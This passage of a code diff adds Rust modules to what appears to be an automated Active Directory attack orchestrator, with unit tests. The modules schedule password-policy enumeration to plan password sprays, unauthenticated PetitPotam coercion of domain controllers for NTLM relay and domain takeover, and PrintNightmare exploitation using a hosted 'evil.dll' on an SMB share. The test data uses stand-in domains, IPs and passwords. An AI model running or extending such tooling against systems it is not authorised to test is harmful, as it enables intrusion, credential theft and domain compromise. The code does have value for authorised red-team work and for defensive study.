+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ let work = collect_ntlmv1_work(&state);
+ assert_eq!(work.len(), 1);
+ assert!(work[0].dedup_key.starts_with("ntlmv1:"));
+ assert!(work[0].dedup_key.contains("192.168.58.10"));
+ assert!(!work[0].dedup_key.contains("contoso"));
+ }
+
+ #[test]
+ fn collect_prefers_same_domain_credential() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_cred("fabuser", "fabrikam.local"));
+ state
+ .credentials
+ .push(make_cred("conuser", "contoso.local"));
+ let work = collect_ntlmv1_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "conuser");
+ }
+
+ #[test]
+ fn dedup_keys_differ_per_dc() {
+ let key1 = format!("ntlmv1:{}", "192.168.58.10");
+ let key2 = format!("ntlmv1:{}", "192.168.58.20");
+ assert_ne!(key1, key2);
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/password_policy.rs b/ares-cli/src/orchestrator/automation/password_policy.rs
new file mode 100644
index 00000000..9ae27ca8
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/password_policy.rs
@@ -0,0 +1,380 @@
+//! auto_password_policy -- enumerate password policy per domain.
+//!
+//! Password policies reveal lockout thresholds, complexity requirements, and
+//! minimum lengths. This information is critical for planning password spray
+//! attacks without triggering lockouts.
+//!
+//! Dispatches `password_policy` recon tasks per discovered domain+DC pair.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+fn collect_password_policy_work(state: &StateInner) -> Vec {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for (domain, dc_ip) in &state.all_domains_with_dcs() {
+ let dedup_key = format!("policy:{}", domain.to_lowercase());
+ if state.is_processed(DEDUP_PASSWORD_POLICY, &dedup_key) {
+ continue;
+ }
+
+ let cred = match state
+ .credentials
+ .iter()
+ .find(|c| c.domain.to_lowercase() == domain.to_lowercase())
+ .or_else(|| state.credentials.first())
+ {
+ Some(c) => c.clone(),
+ None => continue,
+ };
+
+ items.push(PasswordPolicyWork {
+ dedup_key,
+ domain: domain.clone(),
+ dc_ip: dc_ip.clone(),
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Enumerates password policy on each domain controller.
+/// Interval: 30s.
+pub async fn auto_password_policy(
+ dispatcher: Arc,
+ mut shutdown: watch::Receiver,
+) {
+ let mut interval = tokio::time::interval(Duration::from_secs(30));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("password_policy") {
+ continue;
+ }
+
+ let work: Vec = {
+ let state = dispatcher.state.read().await;
+ collect_password_policy_work(&state)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "password_policy",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("password_policy");
+ match dispatcher
+ .throttled_submit("recon", "credential_access", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ "Password policy enumeration dispatched"
+ );
+
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_PASSWORD_POLICY, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_PASSWORD_POLICY, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(domain = %item.domain, "Password policy task deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, domain = %item.domain, "Failed to dispatch password policy enum");
+ }
+ }
+ }
+ }
+}
+
+struct PasswordPolicyWork {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use crate::orchestrator::state::StateInner;
+
+ fn make_credential(
+ username: &str,
+ password: &str,
+ domain: &str,
+ ) -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("policy:{}", "contoso.local");
+ assert_eq!(key, "policy:contoso.local");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_PASSWORD_POLICY, "password_policy");
+ }
+
+ #[test]
+ fn payload_structure_has_correct_technique() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let payload = json!({
+ "technique": "password_policy",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+ assert_eq!(payload["technique"], "password_policy");
+ assert_eq!(payload["target_ip"], "192.168.58.10");
+ assert_eq!(payload["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = PasswordPolicyWork {
+ dedup_key: "policy:contoso.local".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ credential: cred,
+ };
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.dc_ip, "192.168.58.10");
+ assert_eq!(work.dedup_key, "policy:contoso.local");
+ }
+
+ #[test]
+ fn dedup_key_normalizes_domain() {
+ let key = format!("policy:{}", "CONTOSO.LOCAL".to_lowercase());
+ assert_eq!(key, "policy:contoso.local");
+ }
+
+ #[test]
+ fn dedup_keys_differ_per_domain() {
+ let key1 = format!("policy:{}", "contoso.local");
+ let key2 = format!("policy:{}", "fabrikam.local");
+ assert_ne!(key1, key2);
+ }
+
+ #[test]
+ fn collect_empty_state_returns_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_password_policy_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_password_policy_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_domain_controllers_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_password_policy_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_single_domain_produces_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_password_policy_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dc_ip, "192.168.58.10");
+ assert_eq!(work[0].dedup_key, "policy:contoso.local");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_multiple_domains_produces_work_for_each() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_password_policy_work(&state);
+ assert_eq!(work.len(), 2);
+ let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect();
+ assert!(domains.contains(&"contoso.local"));
+ assert!(domains.contains(&"fabrikam.local"));
+ }
+
+ #[test]
+ fn collect_dedup_skips_already_processed_domain() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_PASSWORD_POLICY, "policy:contoso.local".into());
+ let work = collect_password_policy_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dedup_skips_processed_keeps_unprocessed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_PASSWORD_POLICY, "policy:contoso.local".into());
+ let work = collect_password_policy_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "fabrikam.local");
+ }
+
+ #[test]
+ fn collect_prefers_same_domain_credential() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_password_policy_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "admin");
+ assert_eq!(work[0].credential.domain, "contoso.local");
+ }
+
+ #[test]
+ fn collect_falls_back_to_first_credential() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ // Only fabrikam credential available
+ state
+ .credentials
+ .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_password_policy_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "fabuser");
+ assert_eq!(work[0].credential.domain, "fabrikam.local");
+ }
+
+ #[test]
+ fn collect_dedup_key_lowercased() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_password_policy_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dedup_key, "policy:contoso.local");
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/petitpotam_unauth.rs b/ares-cli/src/orchestrator/automation/petitpotam_unauth.rs
new file mode 100644
index 00000000..e67ce2e8
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/petitpotam_unauth.rs
@@ -0,0 +1,323 @@
+//! auto_petitpotam_unauth -- attempt unauthenticated PetitPotam (MS-EFSRPC)
+//! coercion against DCs.
+//!
+//! On unpatched systems, EfsRpcOpenFileRaw allows unauthenticated NTLM coercion.
+//! This was patched in August 2021 (KB5005413) but many environments still have
+//! it open. The check requires no credentials — only a listener IP and DC target.
+//!
+//! If successful, the captured DC machine account NTLM auth can be relayed to
+//! LDAP or ADCS for domain takeover.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect PetitPotam unauth work items from current state.
+///
+/// Pure logic extracted from `auto_petitpotam_unauth` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_petitpotam_unauth_work(state: &StateInner, listener: &str) -> Vec {
+ state
+ .domain_controllers
+ .iter()
+ .filter(|(_, dc_ip)| dc_ip.as_str() != listener)
+ .filter(|(_, dc_ip)| {
+ let dedup_key = format!("petitpotam_unauth:{dc_ip}");
+ !state.is_processed(DEDUP_PETITPOTAM_UNAUTH, &dedup_key)
+ })
+ .map(|(domain, dc_ip)| PetitPotamWork {
+ dedup_key: format!("petitpotam_unauth:{dc_ip}"),
+ domain: domain.clone(),
+ dc_ip: dc_ip.clone(),
+ listener: listener.to_string(),
+ })
+ .collect()
+}
+
+/// Attempts unauthenticated PetitPotam against each DC once.
+/// Interval: 45s.
+pub async fn auto_petitpotam_unauth(
+ dispatcher: Arc,
+ mut shutdown: watch::Receiver,
+) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("petitpotam_unauth") {
+ continue;
+ }
+
+ let listener = match dispatcher.config.listener_ip.as_deref() {
+ Some(ip) => ip.to_string(),
+ None => continue,
+ };
+
+ let work: Vec = {
+ let state = dispatcher.state.read().await;
+ collect_petitpotam_unauth_work(&state, &listener)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "petitpotam_unauthenticated",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "listener_ip": item.listener,
+ });
+
+ let priority = dispatcher.effective_priority("petitpotam_unauth");
+ match dispatcher
+ .throttled_submit("coercion", "coercion", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ "Unauthenticated PetitPotam coercion dispatched"
+ );
+
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_PETITPOTAM_UNAUTH, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_PETITPOTAM_UNAUTH, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(dc = %item.dc_ip, "PetitPotam unauth deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, dc = %item.dc_ip, "Failed to dispatch PetitPotam unauth");
+ }
+ }
+ }
+ }
+}
+
+struct PetitPotamWork {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+ listener: String,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use crate::orchestrator::state::StateInner;
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("petitpotam_unauth:{}", "192.168.58.10");
+ assert_eq!(key, "petitpotam_unauth:192.168.58.10");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_PETITPOTAM_UNAUTH, "petitpotam_unauth");
+ }
+
+ #[test]
+ fn skips_self_listener() {
+ let dc_ip = "192.168.58.50";
+ let listener = "192.168.58.50";
+ assert_eq!(dc_ip, listener);
+ }
+
+ #[test]
+ fn no_cred_required() {
+ // PetitPotam unauth works without credentials
+ let _payload = serde_json::json!({
+ "technique": "petitpotam_unauthenticated",
+ "target_ip": "192.168.58.10",
+ "listener_ip": "192.168.58.50",
+ });
+ // No credential field needed
+ }
+
+ #[test]
+ fn payload_structure_has_correct_technique() {
+ let payload = serde_json::json!({
+ "technique": "petitpotam_unauthenticated",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "listener_ip": "192.168.58.50",
+ });
+ assert_eq!(payload["technique"], "petitpotam_unauthenticated");
+ assert_eq!(payload["target_ip"], "192.168.58.10");
+ assert_eq!(payload["domain"], "contoso.local");
+ assert_eq!(payload["listener_ip"], "192.168.58.50");
+ assert!(payload.get("credential").is_none());
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let work = PetitPotamWork {
+ dedup_key: "petitpotam_unauth:192.168.58.10".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ listener: "192.168.58.50".into(),
+ };
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.dc_ip, "192.168.58.10");
+ assert_eq!(work.listener, "192.168.58.50");
+ }
+
+ #[test]
+ fn dedup_key_based_on_dc_ip() {
+ let dc_ip = "192.168.58.10";
+ let key = format!("petitpotam_unauth:{dc_ip}");
+ assert_eq!(key, "petitpotam_unauth:192.168.58.10");
+ }
+
+ #[test]
+ fn dedup_keys_differ_per_dc() {
+ let key1 = format!("petitpotam_unauth:{}", "192.168.58.10");
+ let key2 = format!("petitpotam_unauth:{}", "192.168.58.20");
+ assert_ne!(key1, key2);
+ }
+
+ #[test]
+ fn listener_excluded_from_targets() {
+ let dc_ip = "192.168.58.10";
+ let listener = "192.168.58.50";
+ assert_ne!(dc_ip, listener, "DC should not be the listener");
+
+ let self_target_dc = "192.168.58.50";
+ assert_eq!(self_target_dc, listener, "Self-targeting should be skipped");
+ }
+
+ // --- collect_petitpotam_unauth_work tests ---
+
+ #[test]
+ fn collect_empty_state_returns_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_petitpotam_unauth_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_dcs_returns_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_petitpotam_unauth_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_single_dc_produces_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_petitpotam_unauth_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dc_ip, "192.168.58.10");
+ assert_eq!(work[0].dedup_key, "petitpotam_unauth:192.168.58.10");
+ assert_eq!(work[0].listener, "192.168.58.50");
+ }
+
+ #[test]
+ fn collect_no_credentials_still_produces_work() {
+ // PetitPotam unauth does NOT require credentials
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_petitpotam_unauth_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ }
+
+ #[test]
+ fn collect_skips_dc_matching_listener() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.50".into());
+ let work = collect_petitpotam_unauth_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dedup_skips_already_processed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state.mark_processed(
+ DEDUP_PETITPOTAM_UNAUTH,
+ "petitpotam_unauth:192.168.58.10".into(),
+ );
+ let work = collect_petitpotam_unauth_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_multiple_dcs_produces_work_for_each() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ let work = collect_petitpotam_unauth_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 2);
+ let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect();
+ assert!(domains.contains(&"contoso.local"));
+ assert!(domains.contains(&"fabrikam.local"));
+ }
+
+ #[test]
+ fn collect_dedup_skips_processed_keeps_unprocessed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state.mark_processed(
+ DEDUP_PETITPOTAM_UNAUTH,
+ "petitpotam_unauth:192.168.58.10".into(),
+ );
+ let work = collect_petitpotam_unauth_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "fabrikam.local");
+ }
+
+ #[tokio::test]
+ async fn collect_via_shared_state() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ }
+ let state = shared.read().await;
+ let work = collect_petitpotam_unauth_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/print_nightmare.rs b/ares-cli/src/orchestrator/automation/print_nightmare.rs
new file mode 100644
index 00000000..868eb8cf
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/print_nightmare.rs
@@ -0,0 +1,477 @@
+//! auto_print_nightmare -- exploit CVE-2021-1675 (PrintNightmare) when
+//! conditions are met.
+//!
+//! PrintNightmare exploits the Print Spooler service to achieve remote code
+//! execution. Requires: valid credentials, target with Print Spooler running
+//! (most Windows hosts by default), and a writable SMB share for the DLL.
+//!
+//! This module dispatches `printnightmare` against hosts where we have
+//! credentials but NOT admin access — it's a priv esc technique.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect PrintNightmare work items from state (pure logic, no async).
+fn collect_print_nightmare_work(
+ state: &StateInner,
+ listener: &str,
+ dll_path: &str,
+) -> Vec {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ // Target all discovered hosts (DCs + member servers)
+ for host in &state.hosts {
+ let ip = &host.ip;
+
+ // Skip if we already tried PrintNightmare on this host
+ if state.is_processed(DEDUP_PRINTNIGHTMARE, ip) {
+ continue;
+ }
+
+ // Skip hosts where we already have admin (secretsdump handles those)
+ if state.is_processed(DEDUP_SECRETSDUMP, ip) {
+ continue;
+ }
+
+ // Infer domain from hostname (e.g. "dc01.contoso.local" -> "contoso.local")
+ let domain = host
+ .hostname
+ .find('.')
+ .map(|i| host.hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+
+ let cred = state
+ .credentials
+ .iter()
+ .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain)
+ .or_else(|| state.credentials.first());
+
+ let cred = match cred {
+ Some(c) => c.clone(),
+ None => continue,
+ };
+
+ items.push(PrintNightmareWork {
+ target_ip: ip.clone(),
+ hostname: host.hostname.clone(),
+ domain: domain.clone(),
+ listener: listener.to_string(),
+ dll_path: dll_path.to_string(),
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Monitors for PrintNightmare exploitation opportunities.
+/// Only targets hosts we don't already have admin on.
+/// Interval: 45s.
+pub async fn auto_print_nightmare(
+ dispatcher: Arc,
+ mut shutdown: watch::Receiver,
+) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("printnightmare") {
+ continue;
+ }
+
+ let listener = match dispatcher.config.listener_ip.as_deref() {
+ Some(ip) => ip.to_string(),
+ None => continue, // need listener for DLL hosting
+ };
+
+ // PrintNightmare requires a UNC path to a hosted malicious DLL. Without
+ // pre-staged SMB share + payload infra, dispatching is guaranteed to
+ // fail on the worker (cve_exploits.rs requires `dll_path`). Skip
+ // cleanly when not configured rather than emitting failed tasks.
+ let dll_path = match std::env::var("ARES_PRINTNIGHTMARE_DLL").ok() {
+ Some(path) if !path.is_empty() => path,
+ _ => continue,
+ };
+
+ let work: Vec = {
+ let state = dispatcher.state.read().await;
+ collect_print_nightmare_work(&state, &listener, &dll_path)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "printnightmare",
+ "target_ip": item.target_ip,
+ "hostname": item.hostname,
+ "domain": item.domain,
+ "listener_ip": item.listener,
+ "dll_path": item.dll_path,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("printnightmare");
+ match dispatcher
+ .throttled_submit("exploit", "privesc", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ target = %item.target_ip,
+ hostname = %item.hostname,
+ "PrintNightmare (CVE-2021-1675) exploitation dispatched"
+ );
+
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_PRINTNIGHTMARE, item.target_ip.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_PRINTNIGHTMARE, &item.target_ip)
+ .await;
+ }
+ Ok(None) => {
+ debug!(target = %item.target_ip, "PrintNightmare task deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, target = %item.target_ip, "Failed to dispatch PrintNightmare");
+ }
+ }
+ }
+ }
+}
+
+struct PrintNightmareWork {
+ target_ip: String,
+ hostname: String,
+ domain: String,
+ listener: String,
+ dll_path: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_PRINTNIGHTMARE, "printnightmare");
+ }
+
+ #[test]
+ fn dedup_key_is_target_ip() {
+ let ip = "192.168.58.22";
+ assert_eq!(ip, "192.168.58.22");
+ }
+
+ #[test]
+ fn domain_from_hostname() {
+ let hostname = "dc01.contoso.local";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "contoso.local");
+ }
+
+ #[test]
+ fn domain_from_bare_hostname() {
+ let hostname = "dc01";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "");
+ }
+
+ #[test]
+ fn payload_structure_validation() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let payload = serde_json::json!({
+ "technique": "printnightmare",
+ "target_ip": "192.168.58.22",
+ "hostname": "srv01.contoso.local",
+ "domain": "contoso.local",
+ "listener_ip": "192.168.58.50",
+ "dll_path": "\\\\192.168.58.50\\share\\evil.dll",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+
+ assert_eq!(payload["technique"], "printnightmare");
+ assert_eq!(payload["target_ip"], "192.168.58.22");
+ assert_eq!(payload["hostname"], "srv01.contoso.local");
+ assert_eq!(payload["domain"], "contoso.local");
+ assert_eq!(payload["listener_ip"], "192.168.58.50");
+ assert_eq!(payload["dll_path"], "\\\\192.168.58.50\\share\\evil.dll");
+ assert_eq!(payload["credential"]["username"], "admin");
+ assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret
+ assert_eq!(payload["credential"]["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "testuser".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let work = PrintNightmareWork {
+ target_ip: "192.168.58.22".into(),
+ hostname: "srv01.contoso.local".into(),
+ domain: "contoso.local".into(),
+ listener: "192.168.58.50".into(),
+ dll_path: "\\\\192.168.58.50\\share\\evil.dll".into(),
+ credential: cred,
+ };
+
+ assert_eq!(work.target_ip, "192.168.58.22");
+ assert_eq!(work.hostname, "srv01.contoso.local");
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.listener, "192.168.58.50");
+ assert_eq!(work.credential.username, "testuser");
+ }
+
+ #[test]
+ fn domain_from_multi_level_hostname() {
+ let hostname = "web01.dmz.contoso.local";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "dmz.contoso.local");
+ }
+
+ #[test]
+ fn domain_from_uppercase_hostname() {
+ let hostname = "DC01.CONTOSO.LOCAL";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "contoso.local");
+ }
+
+ // --- collect_print_nightmare_work tests ---
+
+ use crate::orchestrator::state::StateInner;
+
+ fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: uuid::Uuid::new_v4().to_string(),
+ username: username.to_string(),
